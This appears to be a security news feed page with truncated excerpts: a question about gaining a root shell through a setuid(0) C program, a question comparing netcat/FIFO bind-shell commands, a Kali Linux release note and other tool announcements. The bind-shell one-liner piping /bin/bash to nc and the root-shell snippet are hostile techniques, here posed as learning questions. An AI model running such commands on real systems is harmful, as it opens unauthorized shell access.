How Can I Modify a C Program to Gain Root Shell Access Without Using Sudo or Editing the Sudoers File?

I have a C program that, when executed on my Ubuntu virtual machine, provides a regular shell. The program includes the following code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
setuid(0… Continue reading How Can I Modify a C Program to Gain Root Shell Access Without Using Sudo or Editing the Sudoers File?

Differences in behavior between two Netcat and FIFO commands for creating a bind shell

I am trying to grasp the concept of terminal-emulators, shells and redirections.
I have two commands, both of them start a netcat listener for the bind shell:
1) rm /tmp/fifo; mkfifo /tmp/fifo; cat /tmp/fifo | /bin/bash -i 2>&1 | nc… Continue reading Differences in behavior between two Netcat and FIFO commands for creating a bind shell

Kali Linux 2024.3 released: 11 new tools, Qualcomm Snapdragon SDM845 SoC support

Kali Linux 2024.3 is now available for download. Besides the new tools, this release mainly focuses on behind-the-scenes updates and optimization. New tools in Kali Linux 2024.3 This Kali release is about new tools and package updates: goshs – Th… Continue reading Kali Linux 2024.3 released: 11 new tools, Qualcomm Snapdragon SDM845 SoC support

33 open-source cybersecurity solutions you didn’t know you needed

Open-source cybersecurity tools provide transparency and flexibility, allowing users to examine and customize the source code to fit specific security needs. These tools make cybersecurity accessible to a broader range of organizations and individuals…. Continue reading 33 open-source cybersecurity solutions you didn’t know you needed

Red Hat Enterprise Linux AI extends innovation across the hybrid cloud

Red Hat Enterprise Linux (RHEL) AI is Red Hat’s foundation model platform, enabling users to develop, test, and run GenAI models to power enterprise applications. The platform brings together the open source-licensed Granite LLM family and InstructLab … Continue reading Red Hat Enterprise Linux AI extends innovation across the hybrid cloud